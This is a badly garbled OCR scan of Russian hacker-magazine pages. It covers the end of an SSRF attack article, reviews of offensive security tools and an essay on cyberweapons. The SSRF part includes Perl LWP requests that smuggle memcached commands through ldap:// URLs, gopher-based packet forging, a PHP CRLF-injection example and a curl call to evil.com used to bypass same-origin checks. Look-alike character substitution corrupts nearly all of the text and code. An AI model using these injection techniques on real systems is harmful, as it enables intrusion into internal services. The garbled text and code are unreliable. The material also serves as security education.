~$ пс -1 -ѵѵ -р 8000 > оиН & 

ІізНепіпб оп [апу] 8000 ... 

~$ регі -МІМР -е "ту \$Ь=ШР: :и5егА8епН->пем; 

\$и= ' Ісіар : //ІосаІИозН : 8000/ааааа ' ; \$Ь- >§еН ( \$и ) ; " 

соппесН Но [127.0.0.1] Тгот ІосаІЬозН [127.0.0.1] 47686 
саН оиН 1 Ьехсіитр -С 

00000000 30 2а 02 01 01 63 25 04 05 61 61 61 61 61 ^ 

0а 01 |0*. . .с%. .ааааа. . | 

00000010 00 0а 01 02 02 01 00 02 01 00 01 01 00 87 *-• 

0Ь 6-Р I..,.,..,,,.. ...о| 

00000020 62 6а 65 63 74 43 6с 61 73 73 30 00 ^ 

|Ь^есНС1а5$0. I 

0000002с 

Результат налицо — сервер не стал проверять протокол и сразу 
отправил данные. В дампе четко видна пользовательская часть 
данных 0x61. 

Теперь объединим две эти техники и научим ІѴѴР работать 
с тетсасЬесі через ЮАР, хорошо звучит, на правда ли? :) Сначала 
установим с помощью Іеіпеі ключ тукеу в значение 12345, а потом 
попробуем удалить его через 55РР, используя ІѴѴР и ЮАР. 

НеІпеН ІосаІНозН 11211 
Тгуіп§ : :1. . . 

Тгуіп8 127.0.0.1. . . 

СоппесНесІ Но ІосаІИозН. 

Еэсаре сИагасНег І5 ''']'. 

зеН тукеу 1 3600 5 

12345 

5Т0КЕ0 

§еН тукеу 

ѴАІУЕ тукеу 1 5 

12345 

ЕМО 

циіН 



СоппесНіоп сіозесі Ьу -Рогеі§п ЬозН. 

~$ регі -МІМР -е "ту \$Ь=ІМР: :изегА§епН->пем; 

\$и= ' Ісіар : //ІосаІНозН : 11211/%0асІе1еНе%20тукеу%0ациіН%0а ’ 
і\$Ь->§еН(\$и)і" 

~$ НеІпеН ІосаІИозН 11211 
Тгуіпе ::1... 

Тгуіпб 127.0.0.1... 

СоппесНесІ Но ІосаІИозН. 

Езсаре сИагасНег із ''']'. 

§еН тукеу 
ЕN^ 

Как видно, ключ со временем жизни 3600 секунд и длиной 5 байт 
был успешно удален через 55РР. 

УРІ СХЕМЫ И ПОДДЕРЖКА ПРОТОКОЛОВ 
В СЕТЕВЫХ БИБЛИОТЕКАХ! 

Как мы уже говорили раньше, большинство эксплуатаций основы- 
вается на сетевых библиотеках, которые вызываются тем или иным 
образом. Библиотеки эти могут быть вызваны напрямую из веб- 
приложения или же косвенно через другие функции, например 
из СУБД, парсера какого-то формата файлов или еще откуда-то. 
Главной и самой интересной для нас особенностью сетевых би- 
блиотек является их универсальность, то есть поддержка многих 
протоколов для обмена данными. Как мы понимаем, чем больше 
протоколов реализовано, тем больше вероятность допустить ошиб- 
ку в каком-нибудь из них. 

Библиотека выбирает протокол передачи данных на основе 
УРІ-схемы. Схему эту часто можно передать в пользовательских 
данных, то есть заставить библиотеку выбрать тот или иной протокол 
на наше усмотрение. А дальше надо найти такие протоколы, которые 
удобно было бы использовать для зтиддііпд — про него мы с тобой 
уже все поняли. Самым интересным и полезным оказывается про- 
токол дорЬег://, который Александр Поляков и Дмитрий Частухин 
из ЕРРзсап впервые использовали для 55РР под 5АР и показали 
в Вегасе летом 2012 года. Протокол хорош тем, что байты, следующие 
в пути УРІ, полностью составляют весь ТСР-пакет. Первым байтом 
должен идти тип данных, которые клиент ожидает получить от сер- 
вера, — число от 1 до 9. Первый байт не передается в пакете, пере- 
дается все, что следует за ним. Было бы очень круто подделывать 
любые ТСР-пакеты с помощью дорЬег, но такой малины не бывает. 
Более подробно об этих ограничениях можно прочитать в нашей 
55РР сЬеаІзЬееІ. Вкратце: ^аѵа не пускает байты выше А5СІІ, а сУРІ 
не пускает пиІІ-байт (0x00), зато ІѴѴР работает как надо. Но как бы 
там ни было, дорЬег открывает нам возможность эксплуатации 
бинарных протоколов, так как данные пакета могут быть подделаны 
с самого начала, где обычно располагаются сведения о типе пакета, 
размере и прочие вещи, без которых пакет будет отброшен. 

Остальные протоколы ТСР пригодны для эксплуатации ріаіп/ 
Іехі-протоколов, где разделителями являются символы новой 
строки и перевода каретки. Их мы обнаружили в ходе подготовки 
доклада на 2егоМідЫз 0x02. Это протоколы (УРІ-схемы): сіісі:// 
и Ісіар:// (только 1\Л/Р). Детали ты опять же быстрее прочтешь 
в «55РР ЬіЫе. СЬеаІзЬееІ». Там же можешь найти и более изы- 
сканные варианты, такие как использование сіЬ_Ііпк-функций 
в Розідгез. Вся прелесть ріаіп/іехі-протоколов в том, что боль- 
шинство интересных сервисов, применяемых при проектировании 
веб-приложений, используют именно их. Например, тетсасЬесі, 
различные поБОІ базы данных и, разумеется, бэкенды с РЕ5Т АРІ 
илиХМІРРС. 

Не стоит забывать и о протоколах НТТР(5)/РТР(5). Пусть они 
и не открывают нам возможность подделки запросов для каких- 
либо других протоколов, но тем не менее, при должном умении 
многое можно сделать и только через них. Из типичных примеров, 
которые удавалось получить на практике: чтение внутренней ѵѵікі, 
доступ к серверу с исходниками, получение данных из СоисЬОВ 
(онанаРЕБТАРІ). 
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55РР: великий и ужасный 



»/7р-1#сотт«пи 



БМРоЛ 



Мг МопП>і«м оп ОматЬяг 8, 2012 М 0:23 ат 

Мі, (N8 і8 а согпглепі. 

То (1в»вів а соттвп». іиаі к>д іп апО ѵвѵѵ іЬѳ рові'а соттеШа. ТЬѳгѳ уои ѵіЛ 
Гіаѵе іЬѳ ор(іоп іо ѳОіі ог Ое<ѳіе ігіѳш. 



РШдЬаск. ЕМО 8ТАТ р« 34568 8ТАТ цр»тіѳ 836 8ТАТ Іітв 1357862362 8ТАТ 
ѵвгзіоп 1.4.13 8ТАТ Й)вѵеп1 2.0.17-яаЫѳ 8ТАТ роігпег.вігв 64 8ТАТ 
гиаада.цэаг 0.016189 8ТАТ пяадѳ.зузівт 0.037183 8ТАТ сигт_соппвсііоп8 
1 1 8ТАТ 1о1а)_соппесЪоп8 17 8ТАТ соппѳсііоп_8ігисіигв ь* 

Уязвимость сканирования локальных портов для \ѴогсіРге$$ ХМІРРС ріпдЬаск. 
Результат — получение комментария в блоге с содержимым $(а(5 команды тет- 
сасНесІ :) Подробнее про уязвимость: ьи.1у/КОТ07а 



ЧТЕНИЕ ОТВЕТА СЕРВЕРА. МОЗАИЧНА^ 
КОНСТРУКЦИЯ НУЖНОГО ФОРМАТАІ 
Эксплуатация 55РР в реальной жизни затрудняется тем, что функ- 
ционал, содержащий те или иные описанные уязвимости, просто 
так не выдает нам ответ сервера. Как правило, логика уязвимого 
приложения ожидает какой-то определенный формат ответа и про- 
читать ответ от эксплуатируемого сервиса возможным не пред- 
ставляется. Но это только на первый взгляд. Нет ничего невозмож- 
ного, особенно на сетевом уровне. 

Далеко ходить не будем и рассмотрим пример с того же 
ЕегоМідНіз Ьаскриезі: 



1іЬхт1_сІІ5аЫе_еп-Сі-1:у_1оас1ег(-Сгие);//по ХХЕ 
Рри1:5($Р/'СЕТ /іпсІех.рИр?и5егпате={$_Р05Т[ '1о§іп' ]} 
НТТР/1.1\г\пНо5І:: $Ьо5І:\г\п\г\п");//СРІР іп^ес^іоп 

$гѳ5р = 

мЬі1е($5 = Р8е-С5($Р)) 

$ге5р.=$5; 

$ге$р=5иЬ5І:г($ге5р,$1:гро5($ге5р/’\г\п\г\п"));//геасІ Ьу ^ 
ЕОР, поі Ьу Іел§^Ь Ьеасіег 
$сІос = пем ООМОоситегтСО; 

$Цос->1оасІХМІ($ге5р) ; 

есЬо $сІос - >§е'СЕ1етеітС5ВуТа§Мате( "еггог" )->♦-' 

І1:епі(0) - >посІеѴа1ие ; 

Здесь, как мы уже писали выше, есть возможность отправлять 
через СРІР несколько НТТР-запросов в одном сокете. Веб-сервер 
же на это будет нам отдавать содержимое нескольких НТТР- 
ответов. Теперь внимание на уязвимое приложение — вторая его 
особенность (помимо СРЕР-инъекции в сокет): ответом сервера 
считается все, что идет после первого двойного переноса строки. 
Правильнее было бы читать столько байт, сколько вернулось 
в заголовке СопІепМепдІЬ НТТР-ответа, но приложение работает 
не так. В результате, получив несколько НТТР-ответов, мы про- 
читаем полностью все их содержимое. 

Теперь смотрим на логику обработки ответа сервера. Прочитать 
его удается в том случае, если, во-первых, вернется валидный ХМІ 
и, во-вторых, данные, которые мы хотим прочитать, будут в первом 
теге «еггог». Как бы состряпать такой документ? Очень просто, 
примерно вот так: 

НТТР/1.1 200 ОК 

ОаТе: ТЬи, 08 Nоѵ 2012 14:03:34 СМТ 
Зегѵег: АрасЬе/2.2.16 (ОеЬіап) 

Х-РомегесІ-Ву : РНР/5 . 3 . 3-7+5циее2е14 
Соп-ЬепТі-ІепвІіЬ: 47 
Соп-Ьеп-Ь-Туре: ТехЕ/ЬЕтІ 



® 1^ Р і |Ц> !*і в / и к X ш т о 




2 М0ііиЕСТ(А1)-> 

^ # ІосаІЬс»! ІІ ШДИП 

7 М _ 

7^127.0.0.1 ІОйЙЙЙЙІ іМІМомІЬодІ й8й. к)саІЬо§Іуу 

10 

и ;::1 

12 ^Іѳ80::1%Іо0 ІйяШйЙІ __ 

13 

Что будет, если такой ООР-докуиент попадет на преобразование серверу 
ОрепОЖсе? Будет чтение файлов и 55РР! 

<еггог><! [СОАТА[ 

НТТР/1.1 200 ОК 



НТТР/1.1 200 ОК 



] ]></еггог> 

Для того чтобы получить в НТТР-ответе нужные нам байты, 
можно использовать заголовок запроса Рапде, это позволит полу- 
чить не все данные НТТР-ответа, а только определенные, немного 
похоже на ЗОЫ+зиЬзІг, правда? :) Рапде-заголовок запроса имеет 
следующий формат: «Рапде: ЬуІе5=0-9», где первое число — стар- 
товая позиция для чтения, второе — финальная позиция. Можно 
запрашивать и диапазоны, например «Рапде: Ьу1е5=0-9, 10-20», 
только учти, что они будут разделены в НТТР-ответе аналогично 
тиііірагі-запросу. Разумеется, можно использовать и другие 
методы, такие как вывод в ответ сервера данных из запроса (ага, 
Х55). Главное, чтобы все ответы, которые мы хотим собрать в мо- 
заику нужного нам формата, были получены за одну операцию 
доступа. 

Можно было бы сказать и проще — в одном сокете с одного 
хоста, но это не так. Дело в том, что при консольном вызове сУРЕ 
есть возможность задавать несколько УРЕ через ѵѵіісісагсіз, напри- 
мер: 

сигі Ы:1:р://еѵі1.сот/[1-3] .рИр 

выведен контент по очереди всех трех скриптов І.рЬр, 2.рЬр, З.рЬр. 
(При этом, если какой-то из них будет делать Зхх перенаправле- 
ние, будет выведен уже целевой (перенаправленный) контент. 

А теперь соединим все вместе: І.рЬр: «<1ад><![С0АТА[», 2.рЬр: 
«ЬеасІегГЕосаІіоп: Ьир://ІосаІЬо5і/і-ѵѵапІ-Іо-геасІ-іЬІ5');», З.рЬр: 
«]]><Аад>». Вот так мы похакали 50Р для НТТР-клиента сУ РЕ 
(на самом деле 50Р относится только к браузерам, разумеется). 

ІхорошЕго понемножку] 

На этом вводную статью мы заканчиваем. Просим не расстраивать- 
ся — это только первая часть нашей повести про 55РР-атаки. Во 
второй части мы расскажем уже про практическую эксплуатацию 
атак 55РР, рассмотрим сочные эксплойты и красивые трюки, а мо- 
жет быть, даже похакаем несколько известных систем. Не забывай, 
что самые новые вкусные фичи регулярно публикуются в «55РР 
ЬіЫе. СЬеаІзЬееІ», доступном всем без ограничения в боодіе Оосз 
(кнопка в меню на ІаЬ.опвес.ги или короткая ссылка ооо.дІ/хЗоСд ). 
Теперь ты морально и технически подготовлен к освоению 55РР- 
атак во всех их проявлениях. Дерзай! □□ 
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Дмитрий «01д1» Евдокимов, ОІдКаІ ЗесигИу (іѵѵіиег.сот/еѵсіокігтюѵсіз) 
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Вся информация предо- 
ставлена исключительно 
в ознакомительных 
целях. 

Ни редакция, ни автор не 
несут ответственности 
за любой возможный 
вред, причиненный мате- 
риалами данной статьи. 
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Авторы: Андрей 
Петухов, Георгий 
Носеевич 

ЦКІ: ігПегпаІзесигіІу. 



ррейашіххеліаоІ5.,гір 
Система: Ііпих/ 
ѴѴіпсІоѵѵз 




ѴМІпіесІог х86 ОН ѵО.1 | 

І-^ІШЛ. Іи.иіссі. 

[ ІйѵаіІаЫе 08 8Ідпа1і> 
[О) Оіпсіоиг 7 х64 8П) К 
[11 иіпсіоиз 7 х86 8Р0 а 
[21 Оіпаоѵ/з 7 х86 8Р1 
[31 иіпаочз ХР х86 8Р2 
[41 МЙС 08 X 10.6.4 хіМ 
[51 МЙС 08 X 10.6.8 хЬ4 
[61 НЙС 08 X 10.6.8 кі: 
[71 МЙС 08 X 10.7.3 х61 

[81 ивимти іі.іо, іі.іи 
191 ввинти 11.10, іі.пі 

1«18е1есС 08 (о ипіоск: 



Автор: Магсо Ваіізіа 
ийІ; тір5://ді[ИиЬ. 
сот/ЬаІізІат/ѴМІп- 
іесіог 

Система: ^іпсіоѵѵз 




ѲапсІЬид. соттапсі. асІіопС 
с1а55_1гасе(с1х1, 

сраІМ = апйЬид.орІі 

апсІЬид. зсгееё 

1"0Г с СІХІ 

с. ЬоокЕпІгі 
апбЬид. 5СГ 

сІхІ.ЫоскехіШ 



Автор: ЗсоиОипІор 
иРІ; тір5.7/діиіиЬ. 



АпсіВцд 

Система: Ііпих/ 
ѴѴіпгіоѵѵз / Мае 05 X 




I в ЧУЖОЙ СИСТЕМЕ КАК В СВОЕЙ I 

Не секрет, что для тестирования возмож- 
ности локального включения файлов широко 
используется один из векторов: либо /еіс/ 
ра55ѵѵ(і, либо ../../(много раз)/е1с/ра55ѵѵсі. 
Допустим, ты получил возможность читать 
локальные файлы (и, может быть, просма- 
тривать листинги каталогов). Следующим 
логичным шагом будет поиск «мяса» в ката- 
логах веб-приложения — конфигурационных 
файлов с учетками ко внешним сервисам, ло- 
гов и прочих исходников. Делать это ручками 
долговато. И вот тут нам на помощь приходит 
Ри5Е-драйвер для монтирования удаленной 
файловой системы через уязвимость с воз- 
можностью ІосаІ Рііе Реасі (см. РНРшные ІРІ 
илиХХЕ). 

С его помощью (конечно, немного подкрутив 
питоновский скрипт) ты получишь возмож- 
ность ходить по удаленной файловой системе 
как по локальной и (самое главное!) применять 
твои любимые Р051Х-тулзы типа дгер'а и Ппсі'а. 
К дополнительным возможностям тулзы от- 
носятся: 

• возможность работы через прокси-сервер 

(ты сможешьувидеть все запросы и ответы); 

• возможность кешировать скачанные фай- 
лы для офлайн-доступа. 

Инструмент был впервые представлен 
на ЕегоМідЫз 2012. 



[ВИРТУАЛЬНАЯ инъекция! 

ѴМІпіесІог предназначен для обхода окна 
аутентификации в большинстве основных ОС, 
запущенных на ѴМѵѵаге ^огкзІаІіоп/РІауег. 

Для этого инструмент напрямую манипулирует 
данными в памяти системы виртуализации. 

Как известно, ѴМѵѵаге обрабатывает 
все выделенные ресурсы для гостевой ОС, 
включая РАМ-память. ѴМІп]есІог инжектит 
011-библиотеку в процесс ѴМѵѵаге и полу- 
чает доступ к мапированным ресурсам. 
011-библиотека парсит память выбранного 
процесса ѴМѵѵаге и размещенную там РАМ- 
память соответствующей гостевой машины 
в поисках функции, ответственной за обработ- 
ку введенного пароля. Когда программа ее на- 
ходит, она ее патчит, и можно войти в гостевую 
систему с любым паролем. Сейчас ѴМІп]ес[ог 
может обходить аутентификацию для ѴѴіпсІоѵѵз, 
СІЬипІи и Мае 0$ X. 

Следует отметить, что проводимые из- 
менения в памяти не постоянны и после 
перезагрузки гостевой виртуальной машины 
ее парольный функционал примет прежний 
вид и все придется делать заново. Сам про- 
ект состоит из двух частей: РуіЬоп-скрипта, 
отвечающего за инъекцию 011-библиотек, 
и 011-библиотек (х86/х64). Не стоит забывать 
еще один важный момент: без администра- 
тивного доступа на хостовой машине никак 
не обойтись... 



(ИНТЕРАКТИВНЫЙ ОТЛАДЧИК ОАІѴІІі 

Виртуальная машина Оаіѵік, используемая 
на платформе Апсігоіеі, представляет собой 
^аѵа-подобную виртуальную машину 
для менее мощного железа и в своей работе 
использует регистровый промежуточный код. 

(При отладке ОаІѵіІ<-кода с помощью Есіірзе, 
ЕсІірзе/МеШеапз с Аркіооі или ПОВ существу- 
ют свои проблемы, которые делают процесс 
в той или иной степени неудобным и тормозят 
работу. Однако есть и другие утилиты! 

АпбВид — скриптовый отладчик, нацелен- 
ный как раз на виртуальную машину Оаіѵік. 
Проект написан на 90% на РуіЬоп и на 10% 
на Си. Для своей работы проект использует 
тот же интерфейс, что и плагин для отладки 
АпсігоіеІ в Есіірзе, — ^аѵа ОеЬид ѴѴіге Ргоіосоі 
иоѴѴР) и Оаіѵік ОеЬид Мопііог (ООМ), который 
позволяет: 

• захватывать Оаіѵік-методы; 

• исследоватьсостояние процесса; 

• ставить Ьгеакроіпіз; 

• производитьизменения. 

Таким образом, можно легко дампить загру- 
женные классы, методы, состояния потоков, 
статические атрибуты и проводить трассиров- 
ку вызовов. Ну и естественно, так как отладчик 
является интерактивным, он в первую очередь 
предназначен для написания собственных 
инструментов. 
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7 утилит для исследования безопасности 



ІМЕРсикуІ 

Общий процесс оценки безопасности 
АпсігоісІ-приложений обычно включает 
в себя следующие шаги: 

1. Скачиваниеприложения. 

2. Извлечениефайла манифеста. 

3. Декомпиляция приложения в чи- 
таемый исходный или байт-код. 

4. Анализ манифеста приложения 
и кода. 

5. Написание пользовательского 
приложения для проверкианома- 
лий во входныхточках исследуе- 
мого приложения. 

В итоге на каждом этапе использу- 
ется свой инструмент, что увеличивает 
время анализа приложения, тем более 
когда приложений несколько. И как 
раз для решения данной проблемы 



был создан Мегсигу — фреймворк 
оценки безопасности с открытым ис- 
ходным кодом для платформы Апсігоісі, 
написанный парнями из компании 
МѴѴР ІаЬз. 

Фреймворк предоставляет исследо- 
вателю ряд интерактивных инструмен- 
тов, которые позволяют динамически 
взаимодействовать с исследуемым 
приложением, запущенным на устрой- 
стве (ты удивишься, сколько всего 
можно сделать). Мегсигу состоит из 
двух компонентов, с помощью которых 
и реализуется процесс исследования: 

• агента, устанавливаемого 
на Апсігоісі-устройство; 

• сервера, который работает на ком- 
пьютере и отправляет команды 

на агент. 




сигу 

Система: Ыпих/ 
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ІПРЕДСКАЗЫВАЕМ ИСХОДНЫЙ КОДІ 

При пентесте нужно сделать очень много 
вещей: доодіе Ьаскіпд, ^іпдегргіпііпд, аПаск 
виг^асе сіізсоѵегу, ѵиІпегаЬіІіІу зсаппіпд, 
ехріоіаііоп и так далее. При ручном анализе 
стоит не забывать о 34 типах атак и 15 слабо- 
стях в соответствии с ѴѴА5С и 64 типах атак 
и 165 уязвимостях в соответствии с 0ѴѴА9Р. 
Чтобы ускорить процесс, можно собрать боль- 
ше информации о системе и проверять только 
то, что в ней действительно может быть. 

Оіѵіпег — уникальная платформа для актив- 
ного сбора информации, выполненная в виде 
расширения для 0\Л/А$Р 2АР, которая пытается 
предсказать структуру серверной памяти, 
исходный код приложения и процессы. Делает 
она это, выполняя сценарии, целью которых 
является ^іпдегргіпі поведения, вытекающего 
из конкретных строк кода, процессов или рас- 
пределений памяти. В своей работе Оіѵіпег ис- 
пользует различные процессы покрытия кода, 
тесты дифференциации контента и различные 
сценарии на входные точки в исследуемое 
приложение. 

Возможности: 

• визуализация потока данных; 

• предсказание исходного кода; 

• предсказание структуры памяти; 

• менеджер списка задач; 

• менеджер рауіоасі'ов, интегрированный 
в2АР-повторитель. 



[ПРОНИКАЕМ в ѴѴІМР0Щ5 РНОМЕІ 

Для мобильной ос ѴѴіпбоѵѵБ РНопе уже доступ- 
но большое количество нужных приложений. 
Однако достойных инструментов для анализа 
безопасности приложений под \Л/Р еще нет! 

И вот на конференции ВІаскНаі АЬи ОЬаЬі 2012 
был представлен инструмент Тапдегіпе, кото- 
рый позволяет анализировать ^іпсіоѵуз РЬопе 
приложения. При помощи Тапдегіпе ты можешь 
понять логику работы приложения и найти 
уязвимости, даже не имея исходных кодов. 

Программа автоматизирует большое коли- 
чество рутинных задач: распаковку ХАР-файла, 
удаление подписи, переподписывание при- 
ложения, упаковку и загрузку на эмулятор. Ути- 
лита помогает производить как статический 
анализ (информация о приложении, сараЬіІіІіез 
приложения, анализ структуры кода, просмотр 
используемого АРІ, просмотр 11-кода), так и ди- 
намический анализ приложения (трассировка 
функций, запуск собственного кода). 

Можно просматривать, какие функции, 
с какими параметрами вызывало приложение 
и что они возвращали. Но главная особенность 
утилиты — это способность инструментировать 
чужой код. Можно вставлять свой код перед 
определенным методом, после или вместо 
него и изменять значения входных параметров. 
Пока что поддерживаются только приложения 
под Ѵ^Р7, но авторы работают над поддержкой 
ѴѴР8. 



[ИЗУЧАЕМ ПРОТОКОЛ 0РАТАІ 

Ореп Оаіа Ргоіосоі (ООаІа) — это открытый 
веб-протокол для запроса и обновления 
данных. ООаІа позволяет создавать РЕ5Т(и1 
сервисы передачи данных, которые можно ис- 
пользовать для публикации и редактирования 
ресурсов, идентифицирующихся с помощью 
ІІРІ. Протокол позволяет выполнять опера- 
ции с ресурсами с помощью НТТР-запросов 
и получать результаты в форматах Аіот, ^50N 
или ХМІ. Данный протокол сейчас активно 
используется в продуктах таких гигантов, 
как МІСГ030І1, ІВМ, 5АР и других. Есть про- 
токол и уязвимости в нем — значит, нужен ин- 
струмент, который помогает оценить безопас- 
ность его использования. И как раз для этого 
и служит проект Оуесіаіа, написанный на С#. 
Особенности: 

• бОІ; 

• создание шаблонов атак из метаданных; 

• полезные нагрузки для атак; 

• идентифицирование ключей и свойств; 

• поддержка ХМІ и ^50N форматов данных; 

• поддержка веб-прокси, НТТР(5); 

• создание «Реаб ІІРІ»; 

• фаззинг; 

• ручное тестирование. 

А для успешного старта рекомендую по- 
читать мануал «А Репіевіег'з биісіе Іо Наскіпд 
ООаІа». 
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МАШАКЕ 



Н. Н. Федотов ((ппШпп.ги) 




О МАЛВАРИ НАСТОЯЩЕГО, 
КИБЕРВОЙНЕ БУДУЩЕГО 
И РОБОТАХ-ОФИЦИАНТАХ 



ро кибероружие говорили (и даже 
снимали боевики) уже давно. А пока- 
зать в натуре не могли. Вот и сложилось 
такое впечатление, что все это — несерьезно. 

Не исключено, что так оно и есть. Однако после 
первого в истории киберудара самоходным троя- 
ном Біихпеі по иранским уранообогатительным 
заводам финансирование проекта не закрыли. 
Очень быстро вышли в свет Оици и РІате, а так- 
же, возможно, еще пара моделей, которые пока 
не попались на глаза антивирусным аналитикам. 
Следовательно, кибероружие пошло в серию. 

И значит, его собираются применять. 



Когда люди придумали боевые отравляющие 
вещества, на этот новый, доселе неивестный, 
вид оружия тоже возлагали большие надеж- 
ды. Думали, что война теперь станет дешевле 
и будет нести значительно меньше разрушений. 
Надежды, как известно, не оправдались еще 
в ходе Первой мировой, а во время Второй 
мировой ни одна из сторон даже не пыталась 
применять газы. Новый вид вооружения, 
не выиграв ни одного сражения, так и ушел 
в легенды; в последующие годы им лишь запу- 
гивали мирное население — преимущественно 
собственное. 



На кибероружие ныне также возлагают 
надежды. Автор не знает, насколько сильны 
надежды у военных, но гражданские бодренько 
потирают руки в предвкушении массовых за- 
казов на средства защиты. Угроза из киберпро- 
странства обойдется обществу особенно дорого, 
потому что ИТ и ИТ-кадры стоят недешево. 

Традиционные компьютерные вирусы и по- 
следующая разномастная малварь воспринима- 
лись обывателем сперва как стихийная сила. Ну, 
заразились, ну, потеряли информацию... Страха 
совсем немного, ненависти вообще нет. Затем 
их воспринимали как орудие компьютерных зло- 
умышленников — умных, но мелких преступни- 
ков. Ну, украли, ну, бывает... Денег жалко, а не- 
нависть весьма умеренная. Тратить на защиту 
следует не больше, чем в среднем могут украсть. 

Теперь на сцену выходят боевые компьютер- 
ные программы, за которыми маячит не поме- 
шанный вирмейкер-социопат и не жулики-кар- 
деры. За ними обывателю видятся кровожадные 
политики и генералы страны вероятного (для 
кого-то — вполне актуального) противника. 
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Если завтра — кибервойна 
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Тут надо вести речь не просто о хулиганстве 
или краже мелочи. Все знают, что война ведется 
с целью уничтожения, захвата и порабощения. 
Военно-политического противника ненавидят 
и боятся на всю катушку. Для обороны отечества 
принято не жалеть ничего. «Вот! — восклицает 
циничный ВПК. — Это как раз то, что надо!» 

Кибероружие будет стимулировать не только 
производство и сбыт технических средств защи- 
ты информации, но и ограничение гражданских 
свобод. В этом деле слишком много заинте- 
ресованных, чтобы опыт применения Біихпеі 
оказался забыт. Даже если бы он был не таким 
удачным, его бы распиарили. Чем больше стра- 
ха, тем легче люди мирятся с «безопасностью». 

Теперь еще парочка техногенных аварий, 
в которых может быть замешан кибердивер- 
сант, — и начнется. Личный досмотр при входе 
в здание или на митинг россияне уже восприни- 
мают спокойно, хотя при Горбачеве за такое бы 
как минимум морду набили. Пяток лет при ки- 
беругрозе — и «в интернет по паспорту» будет 
казаться единственным возможным вариантом. 



Так что если бы кибероружия не бцпо, его бы 
однозначно следовало придумать. Печально то, 
что с учетом развития современных технологий 
придумывать его не пришлось. Оно есть, и каж- 
дый айтишник видит технические возможности 
для ударов из киберпространства. 

Теперь вспомним миры Айзека Азимова. 

В этих мирах компьютеры именуются «робота- 
ми» и, в отличие от наших, имеют механические 



манипуляторы и возможность передвигаться. 

То есть умеют причинять человеку физический 
вред. Чтобы не жить в постоянном страхе перед 
этими монстрами, люди ввели знаменитые Три 
закона робототехники, которые каким-то фан- 
тастическим способом закладываются во всех 
выпускаемых роботов. 

Ныне человечество вплотную подошло к той 
границе развития, где почувствовалась необхо- 
димость азимовских Трех законов. Механиче- 
ских манипуляторов и свободы передвижения 
у современных компьютеров (роботов) пока нет. 
Но вред человеку они уже причинять умеют. 
Воруют деньги, нарушают права интеллекту- 
альной собственности, клевещут, оскорбляют, 
пропагандируют наркотики, занимаются растле- 
нием — это все виды нефизического вреда, при- 
чиняемого человеку компьютерами. Вы скажете, 
что компьютер здесь только орудие, а вред-то 
причиняют люди. Да, но это вопрос юридической 
квалификации. Просто так договорились в свое 
время, что человек является субъектом права, 
'0‘‘неодушевленная машина не является’. Чтобы 
всегда было с кого спрашивать. ^ 

В наше время спрашивать уже недостаточно. 
Требуется механизм, который не допустит, чтобы 
роботом (при посредстве робота) был нанесен 
вред. Механизм, который был бы встроен в са- 
мого робота, как придумал Азимов; механизм, 
который предотвратит вред независимо оттого, 
найдут ли виновного субъекта. 

Именно по азимовским рецептам в ряде 
стран принимаются законы, которые ругают 
«интернет-цензурой» и «закручиванием гаек». 
Во-первых, информационные системы (роботы) 
должны блокировать трафик, считающийся 
вредным для людей, — порнографию, пропаган- 
ду наркотиков, нарушение авторских прав и про- 
чее. Сами должны блокировать, не дожидаясь 
решения суда по каждому случаю. Во-вторых, 
они должны подчиняться государственной 
власти; соответствующее ведомство должно 
получить возможность отдать команду любому 
серверу или сети (кому бы та ни принадлежала) 
напрямую, а не через бюрократию провайдера 
и сисадмина, который, может быть, и не поже- 
лает ее выполнять. В-третьих, информационные 
системы должны быть защищены от несанкци- 
онированного вмешательства, обхода и преодо- 
ления запретов. Смотрите, это же и есть клас- 
сические азимовские законы! Только роботы 
пока не человекообразные. И «вред человеку» 
трактуется не столь узко, как у фантаста. 



В 2003 году автор посещал Филиппины. Что меня там удивило — тотальные досмотры 
везде: при входе в метро, во все торговые центры, в междугородных автобусах, 
кинотеатрах и так далее. В часы пик это оборачивается громадными очередями. 

Но филиппинцы терпят, потому что — опасность терроризма. Всех белых всюду 
пропускают без досмотра. Потому что белые там большей частью американцы, 
а у них же права человека! Американцев обижать чревато. 



' В истории бывало по-разному. Кроме человека, субъектом права являлись и неодушевлен- 
ные предметы, а также сверхъестественные существа. И наоборот — многие люди являлись не 
субъектами, а объектами права. 
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Кроме вреда морального и имуществен- 
ного, компьютеры постепенно подбираются 
к физическому. Все больше мест, где возможна 
деструктивная компьютерная команда — после- 
довательность битов, приводящая к физическим 
разрушениям, травмам, пожарам, отравлениям 
и так далее. Именно такие места превращают 
малварь в кибероружие. Роботы отращивают 
себе «руки» и тем самым становятся поража- 
ющим фактором в будущей войне. Эти «руки», 
«ноги» и даже оружие они получают от человека. 

Тихо и незаметно прошло восстание машин. 
Человек сам, совершенно добровольно уступил 
компьютерам управление критичными и опас- 
ными объектами: транспортом, финансами, 
ракетами, авиацией, навигацией, электросе- 
тями, логистикой, выборами. Всем этим давно 
управляют компьютеры, а человек думает, 
что управляет компьютерами. На самом деле че- 
ловеческий контроль достаточно номинальный. 

Чтобы ясно стало, как человек «управляет» 
роботами, рассмотрим для примера артиллерий- 
ские системы защиты от противокорабельных 
ракет. ПКР — страшная штука: выстреливается 
из-за пределов зоны поражения, умеет лететь 
на высоте 5 метров со сверхзвуковой скоростью, 
на фоне воды радаром обнаруживается крайне 
плохо, запросто уничтожает боевой корабль, ко- 
торый строили три года и который стоит милли- 
ард долларов. На поражение подлетающей ПКР 
у корабельной ПВО есть всего две-три секунды, 
за которые надо прицелиться, навести стволы, 
открыть огонь и попасть несколько раз. Такое 
под силу только компьютерам, с конца 1980-х 
именно они управляют артсистемами ПВО, в том 
числе дают команду на открытие огня. А человек 



может посидеть в сторонке. Формально за опе- 
ратором остается последнее слово, он в любой 
момент имеет право вмешаться, но если вмеша- 
ется, слово действительно станет последним — 
ПКР успеет поразить цель. 

В других информационных системах зависи- 
мость человека от машинного думателя не столь 
драматична. Того, кто не положится на элек- 
тронные мозги, вместо смерти под водой ждет 
всего лишь банкротство, потеря инвестиций, 
выпуск брака, падение спутника или, скажем, 
сбой знергоснабжения региона. Все они, как ал- 
коголики, твердят себе: «Я в любой момент могу 
бросить, то есть перехватить управление. Если 
понадобится...» Но мы-то понимаем, что не бро- 
сит он, даже если «захочет». И не захочет. 
Компьютерное управление сложными произ- 
водствами и процессами дает столь большое 
конкурентное преимущество, что «бросить» 
нельзя. Разве что только всем сразу. 



А если компьютерная аддикция столь вели- 
ка, то велика и роль чисто информационного 
воздействия со стороны противника. Ее пока 
что не осознали. Во всяком случае, не осознали 
генералы, которые по традиции мыслят в кате- 
гориях рубильников и кнопок. Нужен прецедент 
выхода из повиновения управляемого оружия. 
